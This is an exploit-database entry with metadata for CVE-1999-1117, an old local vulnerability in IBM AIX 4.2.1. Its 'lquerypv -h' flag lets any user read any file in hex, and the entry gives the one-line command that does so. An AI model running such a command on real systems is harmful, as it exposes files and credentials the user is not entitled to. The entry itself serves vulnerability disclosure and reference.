[] NeoSense

IBM AIX 4.2.1 - 'lquerypv' File Read

Author: Aleph1
type: local
platform: aix
port: nan
date_added: 1996-11-24 
date_updated: 2017-11-15 
verified: 1 
codes: CVE-1999-1117;OSVDB-1005 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/455/info

There exists a vulnerability in the lquerypv command under AIX. By using the '-h' flaq, a user may read any file on the file system in hex format.


/usr/sbin/lquerypv -h /pathtofilename